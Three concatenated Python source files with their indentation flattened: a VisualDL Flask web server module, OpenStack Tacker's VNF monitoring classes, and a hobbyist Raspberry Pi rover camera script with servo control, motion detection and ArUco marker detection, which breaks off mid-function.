# Copyright (c) 2017 VisualDL Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =======================================================================
import os
import time
import sys
import multiprocessing
import threading
import re
import webbrowser
import requests
from visualdl import __version__
from visualdl.utils import update_util
from flask import (Flask, Response, redirect, request, send_file, make_response)
from flask_babel import Babel
import visualdl.server
from visualdl.server.api import create_api_call
from visualdl.server.args import (ParseArgs, parse_args)
from visualdl.server.log import info
from visualdl.server.template import Template
SERVER_DIR = os.path.join(visualdl.ROOT, 'server')
support_language = ["en", "zh"]
default_language = support_language[0]
server_path = os.path.abspath(os.path.dirname(sys.argv[0]))
template_file_path = os.path.join(SERVER_DIR, "./dist")
mock_data_path = os.path.join(SERVER_DIR, "./mock_data/")
check_live_path = '/alive'
def create_app(args):
# disable warning from flask
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
app = Flask('visualdl', static_folder=None)
app.logger.disabled = True
# set static expires in a short time to reduce browser's memory usage.
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 30
app.config['BABEL_DEFAULT_LOCALE'] = default_language
babel = Babel(app)
api_call = create_api_call(args.logdir, args.model, args.cache_timeout)
update_util.PbUpdater().start()
public_path = args.public_path
api_path = public_path + '/api'
@babel.localeselector
def get_locale():
lang = args.language
if not lang or lang not in support_language:
lang = request.accept_languages.best_match(support_language)
return lang
if not args.api_only:
template = Template(
os.path.join(server_path, template_file_path),
PUBLIC_PATH=public_path.lstrip('/'),
API_TOKEN_KEY=''
)
@app.route('/')
def base():
return redirect(public_path, code=302)
@app.route('/favicon.ico')
def favicon():
icon = os.path.join(template_file_path, 'favicon.ico')
if os.path.exists(icon):
return send_file(icon)
return 'file not found', 404
@app.route(public_path + '/')
def index():
lang = get_locale()
if lang == default_language:
return redirect(public_path + '/index', code=302)
lang = default_language if lang is None else lang
return redirect(public_path + '/' + lang + '/index', code=302)
@app.route(public_path + '/<path:filename>')
def serve_static(filename):
return template.render(filename if re.search(r'\..+$', filename) else filename + '.html')
@app.route(api_path + '/<path:method>')
def serve_api(method):
data, mimetype, headers = api_call(method, request.args)
return make_response(Response(data, mimetype=mimetype, headers=headers))
@app.route(check_live_path)
def check_live():
return '', 204
return app
def _open_browser(app, index_url):
while True:
# noinspection PyBroadException
try:
requests.get(index_url)
break
except Exception:
time.sleep(0.5)
webbrowser.open(index_url)
def wait_until_live(args: ParseArgs):
url = 'http://{host}:{port}'.format(host=args.host, port=args.port)
while True:
try:
requests.get(url + check_live_path)
info('Running VisualDL at http://%s:%s/ (Press CTRL+C to quit)', args.host, args.port)
if args.host == 'localhost':
info('Serving VisualDL on localhost; to expose to the network, use a proxy or pass --host 0.0.0.0')
if args.api_only:
info('Running in API mode, only %s/* will be served.', args.public_path + '/api')
break
except Exception:
time.sleep(0.5)
if not args.api_only and args.open_browser:
webbrowser.open(url + args.public_path)
def _run(args):
args = ParseArgs(**args)
info('\033[1;33mVisualDL %s\033[0m', __version__)
app = create_app(args)
threading.Thread(target=wait_until_live, args=(args,)).start()
app.run(debug=False, host=args.host, port=args.port, threaded=False)
def run(logdir=None, **options):
args = {
'logdir': logdir
}
args.update(options)
p = multiprocessing.Process(target=_run, args=(args,))
p.start()
return p.pid
def main():
args = parse_args()
_run(args)
if __name__ == '__main__':
main()
|
monitor.py
|
# Copyright 2015 Intel Corporation.
# All Rights Reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import inspect
import threading
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from tacker.common import driver_manager
from tacker import context as t_context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
OPTS = [
cfg.IntOpt('check_intvl',
default=10,
help=_("check interval for monitor")),
]
CONF.register_opts(OPTS, group='monitor')
def config_opts():
return [('monitor', OPTS),
('tacker', VNFMonitor.OPTS),
('tacker', VNFAlarmMonitor.OPTS),
('tacker', VNFAppMonitor.OPTS)]
def _log_monitor_events(context, vnf_dict, evt_details):
_cos_db_plg = common_services_db_plugin.CommonServicesPluginDb()
_cos_db_plg.create_event(context, res_id=vnf_dict['id'],
res_type=constants.RES_TYPE_VNF,
res_state=vnf_dict['status'],
evt_type=constants.RES_EVT_MONITOR,
tstamp=timeutils.utcnow(),
details=evt_details)
class VNFMonitor(object):
"""VNF Monitor."""
_instance = None
_hosting_vnfs = dict() # vnf_id => dict of parameters
_status_check_intvl = 0
_lock = threading.RLock()
OPTS = [
cfg.ListOpt(
'monitor_driver', default=['ping', 'http_ping'],
help=_('Monitor driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __new__(cls, boot_wait, check_intvl=None):
if not cls._instance:
cls._instance = super(VNFMonitor, cls).__new__(cls)
return cls._instance
def __init__(self, boot_wait, check_intvl=None):
self._monitor_manager = driver_manager.DriverManager(
'tacker.tacker.monitor.drivers',
cfg.CONF.tacker.monitor_driver)
self.boot_wait = boot_wait
if check_intvl is None:
check_intvl = cfg.CONF.monitor.check_intvl
self._status_check_intvl = check_intvl
LOG.debug('Spawning VNF monitor thread')
threading.Thread(target=self.__run__).start()
def __run__(self):
while(1):
time.sleep(self._status_check_intvl)
with self._lock:
for hosting_vnf in self._hosting_vnfs.values():
if hosting_vnf.get('dead', False):
LOG.debug('monitor skips dead vnf %s', hosting_vnf)
continue
try:
self.run_monitor(hosting_vnf)
except Exception as ex:
LOG.exception("Unknown exception: Monitoring failed "
"for VNF '%s' due to '%s' ",
hosting_vnf['id'], ex)
@staticmethod
def to_hosting_vnf(vnf_dict, action_cb):
return {
'id': vnf_dict['id'],
'management_ip_addresses': jsonutils.loads(
vnf_dict['mgmt_url']),
'action_cb': action_cb,
'vnf': vnf_dict,
'monitoring_policy': jsonutils.loads(
vnf_dict['attributes']['monitoring_policy'])
}
def add_hosting_vnf(self, new_vnf):
LOG.debug('Adding host %(id)s, Mgmt IP %(ips)s',
{'id': new_vnf['id'],
'ips': new_vnf['management_ip_addresses']})
new_vnf['boot_at'] = timeutils.utcnow()
with self._lock:
self._hosting_vnfs[new_vnf['id']] = new_vnf
attrib_dict = new_vnf['vnf']['attributes']
mon_policy_dict = attrib_dict['monitoring_policy']
evt_details = (("VNF added for monitoring. "
"mon_policy_dict = %s,") % (mon_policy_dict))
_log_monitor_events(t_context.get_admin_context(), new_vnf['vnf'],
evt_details)
def delete_hosting_vnf(self, vnf_id):
LOG.debug('deleting vnf_id %(vnf_id)s', {'vnf_id': vnf_id})
with self._lock:
hosting_vnf = self._hosting_vnfs.pop(vnf_id, None)
if hosting_vnf:
LOG.debug('deleting vnf_id %(vnf_id)s, Mgmt IP %(ips)s',
{'vnf_id': vnf_id,
'ips': hosting_vnf['management_ip_addresses']})
def run_monitor(self, hosting_vnf):
mgmt_ips = hosting_vnf['management_ip_addresses']
vdupolicies = hosting_vnf['monitoring_policy']['vdus']
vnf_delay = hosting_vnf['monitoring_policy'].get(
'monitoring_delay', self.boot_wait)
for vdu in vdupolicies.keys():
if hosting_vnf.get('dead'):
return
policy = vdupolicies[vdu]
for driver in policy.keys():
params = policy[driver].get('monitoring_params', {})
vdu_delay = params.get('monitoring_delay', vnf_delay)
if not timeutils.is_older_than(
hosting_vnf['boot_at'],
vdu_delay):
continue
actions = policy[driver].get('actions', {})
if 'mgmt_ip' not in params:
params['mgmt_ip'] = mgmt_ips[vdu]
driver_return = self.monitor_call(driver,
hosting_vnf['vnf'],
params)
LOG.debug('driver_return %s', driver_return)
if driver_return in actions:
action = actions[driver_return]
hosting_vnf['action_cb'](action)
def mark_dead(self, vnf_id):
self._hosting_vnfs[vnf_id]['dead'] = True
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._monitor_manager.invoke(
driver, method, **kwargs)
def monitor_get_config(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_url(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_call(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
"""VNF App monitor"""
OPTS = [
cfg.ListOpt(
'app_monitor_driver', default=['zabbix'],
help=_('App monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __init__(self):
self._application_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.app_monitor.drivers',
cfg.CONF.tacker.app_monitor_driver)
def _create_app_monitoring_dict(self, dev_attrs, mgmt_url):
app_policy = 'app_monitoring_policy'
appmonitoring_dict = ast.literal_eval(dev_attrs[app_policy])
vdulist = appmonitoring_dict['vdus'].keys()
for vduname in vdulist:
temp = ast.literal_eval(mgmt_url)
appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = temp[vduname]
return appmonitoring_dict
def create_app_dict(self, context, vnf_dict):
dev_attrs = vnf_dict['attributes']
mgmt_url = vnf_dict['mgmt_url']
return self._create_app_monitoring_dict(dev_attrs, mgmt_url)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._application_monitor_manager.\
invoke(driver, method, **kwargs)
def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
vdunode = applicationvnfdict['vdus'].keys()
driver = applicationvnfdict['vdus'][vdunode[0]]['name']
kwargs = applicationvnfdict
return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
"""VNF Alarm monitor"""
OPTS = [
cfg.ListOpt(
'alarm_monitor_driver', default=['ceilometer'],
help=_('Alarm monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
# get alarm here
def __init__(self):
self._alarm_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.alarm_monitor.drivers',
cfg.CONF.tacker.alarm_monitor_driver)
def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
triggers = policy_dict['triggers']
alarm_url = dict()
for trigger_name, trigger_dict in triggers.items():
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = trigger_name
driver = trigger_dict['event_type']['implementation']
# TODO(Tung Doan) trigger_dict.get('actions') needs to be used
policy_action = trigger_dict.get('action')
if len(policy_action) == 0:
_log_monitor_events(t_context.get_admin_context(),
vnf,
"Alarm not set: policy action missing")
return
# Other backend policies with the construct (policy, action)
# ex: (SP1, in), (SP1, out)
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s-%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(policy_action):
filters = {'name': policy_action_name}
bkend_policies =\
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
bkend_policy = bkend_policies[0]
if bkend_policy['type'] == constants.POLICY_SCALING:
cp = trigger_dict['condition'].\
get('comparison_operator')
scaling_type = 'out' if cp == 'gt' else 'in'
policy_action[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(policy_action)
params['mon_policy_action'] = action_name
alarm_url[trigger_name] =\
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
_log_monitor_events(t_context.get_admin_context(),
vnf,
details)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
mon_prop = trigger['trigger']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
trigger_name, trigger_dict = list(mon_prop.items())[0]
driver = trigger_dict['event_type']['implementation']
return self.process_alarm(driver, vnf, alarm_dict)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._alarm_monitor_manager.invoke(
driver, method, **kwargs)
def call_alarm_url(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
def process_alarm(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
|
app_File.py
|
#!/usr/bin/env python3
##jwc o #!/usr/bin/env python
# Key Notes
#
# jwc 2020-0519 Convert from Crickit_Adafruit to RoboHat_4tronix
# jwc 2020-0519 Use 'gpiozero' for noise-free servo-control
# jwc Add 'robohat.init()'
# jwc Make sure 'servod' copied in from 'RoboHat' dir
# jwc Using 'robohat's' servo cause pan to jitter/cool and tilt to get hot
# jwc 2020-1213 Port in '~/01-Jwc/2020-1205-0640-RpiRover1-DayDevelops/RpiRover1-master' for Slider Ux, db directory
# jwc 2020-1223 AiCam Gen 2.0: StreamVideoToWebBrowser-AdrianRosebrock
# * KEYESTUDIO Fisheye Wide Angle Lens 5MP 1080p OV5647 Sensor Module Supports Night Vision: 130-degrees
# * Smraza 4 Camera Module 5 Megapixels 1080p OV5647 Sensor Adjustable Focus Wide Angle Fish-Eye Camera: 160-degrees
# jwc 2020-1230 AiCam Gen 2.1: 11j-OpenCv-DetectArucoMarkers-FreeBlog/opencv-detect-aruco
from importlib import import_module
import os
import sys
import signal
import threading
import time
import json
import math
from flask import Flask, render_template, request, Response
# jwc n from gevent.wsgi import WSGIServer
# jwc from gevent.pywsgi import WSGIServer
from waitress import serve
# * https://flask.palletsprojects.com/en/1.1.x/deploying/wsgi-standalone/ : Gevent
from gevent.pywsgi import WSGIServer
##jwc n from yourapplication import app
## jwc replace w/ PiUpTimeUps: # * BatteryUps: GeekPi/52pi.com: EP-0118
## jwc replace w/ PiUpTimeUps: # * https://wiki.52pi.com/index.php/UPS_(With_RTC_%26_Coulometer)_For_Raspberry_Pi_SKU:_EP-0118
## jwc replace w/ PiUpTimeUps: #
## jwc replace w/ PiUpTimeUps: from ina219 import INA219
## jwc replace w/ PiUpTimeUps: from ina219 import DeviceRangeError
## jwc replace w/ PiUpTimeUps: resistor_Shunt_OHM_GLOBAL = 0.05
## jwc replace w/ PiUpTimeUps:
## jwc replace w/ PiUpTimeUps: # Define method to read information from coulometer.
## jwc replace w/ PiUpTimeUps: batteryUps_ClObj_Global = INA219(resistor_Shunt_OHM_GLOBAL)
## jwc replace w/ PiUpTimeUps: batteryUps_ClObj_Global.configure()
##jwc replace w/ PiUpTimeUps: def batteryUps_Read_Fn(config_In):
##jwc replace w/ PiUpTimeUps: global batteryUps_ClObj_Global
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Input_V = batteryUps_ClObj_Global.voltage()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Input_V: %.3f V" % config_In._batteryUps_Input_V)
##jwc replace w/ PiUpTimeUps: print(f"*** DEBUG: _batteryUps_Input_V: {config_In._batteryUps_Input_V:.2f} V", end='')
##jwc replace w/ PiUpTimeUps: try:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Output_V = batteryUps_ClObj_Global.shunt_voltage()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Output_V: %.3f mV" % config_In._batteryUps_Output_V)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Output_V: {config_In._batteryUps_Output_V:.2f} mV", end='')
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Temp_C = batteryUps_ClObj_Global.current()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Temp_C: %.3f mA" % config_In._batteryUps_Temp_C)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Temp_C: {config_In._batteryUps_Temp_C:.2f} mA", end='')
##jwc replace w/ PiUpTimeUps:
##jwc replace w/ PiUpTimeUps: config_In._batteryUps_Temp_F = batteryUps_ClObj_Global.power()
##jwc replace w/ PiUpTimeUps: ##jwc y print("*** DEBUG: _batteryUps_Temp_F: %.3f mW" % config_In._batteryUps_Temp_F)
##jwc replace w/ PiUpTimeUps: print(f" // _batteryUps_Temp_F: {config_In._batteryUps_Temp_F:.2f} mW)")
##jwc replace w/ PiUpTimeUps: except DeviceRangeError as e:
##jwc replace w/ PiUpTimeUps: print(e)
import piUpTimeUps_2pt0__AlchemyPower
##jwc y import config_Global_File as config_Global_File
##jwc ? import config_Global_File
##jwc o import config_Global_File as cfg
import config_Global_File
##jwc o import io_wrapper as hw
##jwc y import io_Driver_File
##jwc m import io_Driver_Simulator_File as io_Driver_File
import io_Driver_Simulator_File as io_Driver_File
## jwc o import RPi.GPIO as GPIO
##jwc y from gpiozero import Servo
##jwc o from adafruit_crickit import crickit
##jwc y import robohat
##jwc y robohat.init()
import autoPHat_SparkFun_Driver_File
autoPHat_SparkFun_Driver_File.init()
##jwc y autoPHat_SparkFun_Driver_File.runTest()
##jwc y 2021-0124: Comment out to silence dcmotors test: TODO uncomment later: autoPHat_SparkFun_Driver_File.runTest_Quick()
autoPHat_SparkFun_Driver_File.runTest_Quick()
##jwc n global servo_01_Pan_Degrees
##jwc n servo_01_Pan_Degrees = 90
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
autoPHat_SparkFun_Driver_File.servo_Arm_03_Fn( config_Global_File.servo_03_Degrees )
##jwc o # make two variables for the motors to make code shorter to type
##jwc o # Right-Side
##jwc o motor_1 = crickit.dc_motor_1
##jwc o # Left-Side
##jwc o motor_2 = crickit.dc_motor_2
##jwc 'crickit' o servo_1 = crickit.servo_1
##jwc 'crickit' o servo_2 = crickit.servo_2
#jwc Due to 'robohat.py' using 'GPIO.setmode(GPIO.BOARD)', then convert from BCM Pin# to Board Pin#
##jwc o myGPIO=24
##jwc o myGPIO_02=25
##jwc o Board#: myGPIO = 18
##jwc o Board#: myGPIO_02 = 22
# jwc: Convert from Board# to BCM#
myGPIO = 24
myGPIO_02 = 25
# gpiozero.exc.GPIOPinInUse: pin 6 is already in use by <gpiozero.PWMOutputDevice object on pin GPIO6, active_high=True, is_active=True>
# gpiozero.exc.GPIOPinInUse: pin 18 is already in use by <gpiozero.PWMOutputDevice object on pin GPIO18, active_high=True, is_active=True>
##jwc bcm# y myGPIO = 6
##jwc bcm#24y myGPIO_02 = 18
##jwc ? myGPIO = 24
##jwc n myGPIO_02 = 25 ## Became hot after 5'
##jwc n myGPIO_02 = 6 ## hot also
## jwc ? myGPIO_02 = 18
##jwc o myCorrection=0.45
#jwc remove correction for smaller range
myCorrection=0.00
maxPW=(2.0+myCorrection)/1000
minPW=(1.0-myCorrection)/1000
##jwc y servo = Servo(myGPIO)
##jwc y servo_02 = Servo(myGPIO_02)
##jwc y servo = Servo(myGPIO,min_pulse_width=minPW,max_pulse_width=maxPW)
##jwc y servo_02 = Servo(myGPIO_02,min_pulse_width=minPW,max_pulse_width=maxPW)
##jwc n servo.mid()
##jwc n servo_02.mid()
##jwc 'crickit' ##jwc o GPIO.setmode(GPIO.BCM)
##jwc 'crickit' ##jwc o GPIO.setwarnings(False)
##jwc 'crickit'
##jwc 'crickit'
##jwc 'crickit' ##jwc o servo = 22, 22 is Board Pin #
##jwc 'crickit' ##jwc y servo = 22 # jwc bcm=25
##jwc 'crickit' ##jwc o servo_Pin = 18 # jwc bcm=24
##jwc 'crickit' ##jwc o servo_02_Pin = 22 # jwc bcm=25
##jwc 'crickit'
##jwc 'crickit' ##jwc o bug: GPIO.setmode(GPIO.BOARD).py
##jwc 'crickit' ##jwc o GPIO.setmode(GPIO.BOARD)
##jwc 'crickit' ##TODO jwc jittery: GPIO.setup(servo_Pin, GPIO.OUT)
##jwc 'crickit' ##jwc o GPIO.setup(servo_02_Pin, GPIO.OUT)
##jwc 'crickit'
##jwc 'crickit' # jwc: 5ms = 0.005s -> 1 / 200 = 200Hz
##jwc 'crickit' ##TODO jwc jittery: servo = GPIO.PWM(servo_Pin, 200) # frequency is 500Hz, so each pulse is 5ms wide
##jwc 'crickit' ##jwc o servo_02 = GPIO.PWM(servo_02_Pin, 200) # frequency is 500Hz, so each pulse is 5ms wide
##jwc 'crickit'
##jwc 'crickit' # servos will be fully left at 0.5ms, centred at 1.5ms and fully servoPwm_PositionMin at 2.5ms
##jwc 'crickit' #
##jwc 'crickit' servoPwm_PositionMax = 50/5
##jwc 'crickit' servoPwm_PositionMid = 150/5
##jwc 'crickit' servoPwm_PositionMin = 250/5
##jwc 'crickit'
##jwc 'crickit' ##TODO jwc jitter: servo.start(servoPwm_PositionMid) # start it at 50% - should be servoPwm_PositionMid of servo
##jwc 'crickit' servo_02.start(servoPwm_PositionMid) # start it at 50% - should be servoPwm_PositionMid of servo
##jwc 'crickit' #p.ChangeDutyCycle(100)
##jwc o AiCam Gen 1
##jwc o
##jwc o Raspberry Pi camera module (requires picamera package)
##jwc o from camera_pi import Camera_File
##jwc o
##jwc o def gen(camera):
##jwc o """Video streaming generator function."""
##jwc o while True:
##jwc o frame = camera.get_frame()
##jwc o yield (b'--frame\r\n'
##jwc o b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
##jwc o
##jwc o @app_Cl_Ob.route('/video_feed')
##jwc o def video_feed():
##jwc o """Video streaming route. Put this in the src attribute of an img tag."""
##jwc o return Response(gen(Camera()), mimetype='multipart/x-mixed-replace; boundary=frame')
# AiCam Gen 2.0
#
# import camera driver
##jwc o if os.environ.get('CAMERA'):
##jwc o camera_Cl = import_module('camera_' + os.environ['CAMERA']).camera_Cl
##jwc o print("*** DEBUG: Camera-02a: camera_" + os.environ['CAMERA'])
##jwc o else:
##jwc o ##jwc o from camera import Camera_File
##jwc o # Default to most sophisticated tech
##jwc o from camera_OpenCv_File import camera_Cl
##jwc o print("*** DEBUG: Camera-02b: camera_opencv")
##jwc o from camera import Camera_File
# Default to most sophisticated tech
from camera_OpenCv_File import camera_Cl
print("*** DEBUG: Camera: camera_opencv")
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
##jwc o from pyimagesearch.motion_detection import singleMotionDetector_Cl
from motion_detection.singleMotionDetector_File import singleMotionDetector_Cl
from imutils.video import VideoStream
import threading
import argparse
import datetime
import imutils
import time
import cv2
from collections import defaultdict
##jwc 2.1
##
# define names of each possible ArUco tag OpenCV supports
ARUCO_DICT = {
"DICT_4X4_50": cv2.aruco.DICT_4X4_50,
"DICT_4X4_100": cv2.aruco.DICT_4X4_100,
"DICT_4X4_250": cv2.aruco.DICT_4X4_250,
"DICT_4X4_1000": cv2.aruco.DICT_4X4_1000,
"DICT_5X5_50": cv2.aruco.DICT_5X5_50,
"DICT_5X5_100": cv2.aruco.DICT_5X5_100,
"DICT_5X5_250": cv2.aruco.DICT_5X5_250,
"DICT_5X5_1000": cv2.aruco.DICT_5X5_1000,
"DICT_6X6_50": cv2.aruco.DICT_6X6_50,
"DICT_6X6_100": cv2.aruco.DICT_6X6_100,
"DICT_6X6_250": cv2.aruco.DICT_6X6_250,
"DICT_6X6_1000": cv2.aruco.DICT_6X6_1000,
"DICT_7X7_50": cv2.aruco.DICT_7X7_50,
"DICT_7X7_100": cv2.aruco.DICT_7X7_100,
"DICT_7X7_250": cv2.aruco.DICT_7X7_250,
"DICT_7X7_1000": cv2.aruco.DICT_7X7_1000,
"DICT_ARUCO_ORIGINAL": cv2.aruco.DICT_ARUCO_ORIGINAL,
"DICT_APRILTAG_16h5": cv2.aruco.DICT_APRILTAG_16h5,
"DICT_APRILTAG_25h9": cv2.aruco.DICT_APRILTAG_25h9,
"DICT_APRILTAG_36h10": cv2.aruco.DICT_APRILTAG_36h10,
"DICT_APRILTAG_36h11": cv2.aruco.DICT_APRILTAG_36h11
}
##jwc 2.0
##
# initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful for multiple browsers/tabs
# are viewing tthe stream)
outputFrame = None
lock = threading.Lock()
score_Targeted_Dict = defaultdict(int)
##jwc y score_Targeted_ClosenessToVideoCenter_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict = defaultdict(int)
##jwc o # initialize a flask object
##jwc o app_Cl_Ob = Flask(__name__)
# initialize the video stream and allow the camera sensor to
# warmup
#videoStream_Cl_Ob = VideoStream(usePiCamera=1).start()
print("[INFO] starting video stream...")
videoStream_Cl_Ob = VideoStream(src=0).start()
time.sleep(2.0)
def detect_Motions_ARCHIVED_Fn(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global videoStream_Cl_Ob, outputFrame, lock
# initialize the motion detector and the total number of frames
# read thus far
motionDetect_Cl_Ob = singleMotionDetector_Cl(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it,
# convert the frame to grayscale, and blur it
frame = videoStream_Cl_Ob.read()
frame = imutils.resize(frame, width=400)
# jwc rotate 180-degrees to flip image, since cam is wrongly upside-down
##jwc not work as time stamp upside down: frame = imutils.rotate(frame, 180)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
# cv2.putText(frame, timestamp.strftime(
# "%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = motionDetect_Cl_Ob.detect(gray)
# cehck to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY), (0, 0, 255), 2)
# update the background model and increment the total number
# of frames read thus far
motionDetect_Cl_Ob.update(gray)
total += 1
# acquire the lock, set the output frame, and release the
# lock
with lock:
outputFrame = frame.copy()
## jwc 2.1
##
# Generate 'outputFrame' for later client request
#
##jwc o def detect_Motions_ARCHIVED_Fn(frameCount):
def detect_Motions_And_ArucoMarkers_Fn(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global videoStream_Cl_Ob, outputFrame, lock
# initialize the motion detector and the total number of frames
# read thus far
motionDetect_Cl_Ob = singleMotionDetector_Cl(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it,
# convert the frame to grayscale, and blur it
frame = videoStream_Cl_Ob.read()
##jwc o frame = imutils.resize(frame, width=400)
frame = imutils.resize(frame, width=1000)
video_Height, video_Width = frame.shape[:2] # float
##jwc n video_Width = camera_Cl.__getattribute__(cv2.CAP_PROP_FRAME_WIDTH) # float
##jwc n video_Height = camera_Cl.__getattribute__(cv2.CAP_PROP_FRAME_HEIGHT) # float
video_Center_X = int(video_Width/2)
video_Center_Y = int(video_Height/2)
video_Crosshair_RadiusLength = 200
crosshairs_Line_Thickness = 8
target_Line_thickness = 4
print("*** *** DEBUG: video_Width: " + str(video_Width) + " video_Height: " + str(video_Height) + " video_Center_X: " + str(video_Center_X) + " video_Center_Y: " + str(video_Center_Y))
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# * Detect ArUco Markers: Adrian Rosebrock
#
# detect ArUco markers in the input frame
(corners, ids, rejected) = cv2.aruco.detectMarkers(frame, arucoDict, parameters=arucoParams)
# * Setup Context-Based Color-Scheme
# * Color = (B,G,R)
#
if (config_Global_File.servo_03_Degrees < 180):
# * Arm not in Standby/Neutral/Safety: Max_180 Position, Thus Cam Inactive: Not in viewer mode: Black >> Grey
#
##jwc: crosshairs_Color_BGR_Tuple_ActivatedNot = (255, 255, 255)
##jwc: crosshairs_Color_BGR_Tuple_Activated = (255, 255, 255)
##jwc: target_Color_BGR_Tuple_ActivatedNot = (255, 255, 255)
##jwc; target_Color_BGR_Tuple_Activated = (255, 255, 255)
crosshairs_Color_BGR_Tuple_ActivatedNot = (0, 255, 255)
crosshairs_Color_BGR_Tuple_Activated = (0, 255, 255)
target_Color_BGR_Tuple_ActivatedNot = (0, 255, 255)
target_Color_BGR_Tuple_Activated = (0, 255, 255)
target_Color_BGR_Tuple_Activated_Friendly = (255, 0, 0) # Blue irregardless of Arm-Position
